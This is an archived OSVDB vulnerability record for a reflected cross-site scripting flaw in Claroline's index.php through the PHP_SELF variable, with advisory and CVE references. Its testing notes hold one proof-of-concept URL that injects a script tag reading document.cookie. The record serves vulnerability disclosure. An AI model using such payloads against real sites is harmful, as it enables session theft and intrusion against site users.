Claroline demo/claroline170/index.php $_SERVER PHP_SELF Variable XSS

2007-03-11T00:00:00
ID OSVDB:36334
Type osvdb
Reporter Fernando Munoz()
Modified 2007-03-11T00:00:00

Description

Manual Testing Notes

http://[target]/demo/claroline170/index.php/%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

References:

Secunia Advisory ID:25887 Related OSVDB ID: 36333 Other Advisory URL: http://www.claroline.net/forum/viewtopic.php?t=11920 FrSIRT Advisory: ADV-2007-2402 CVE-2007-3517 Bugtraq ID: 24742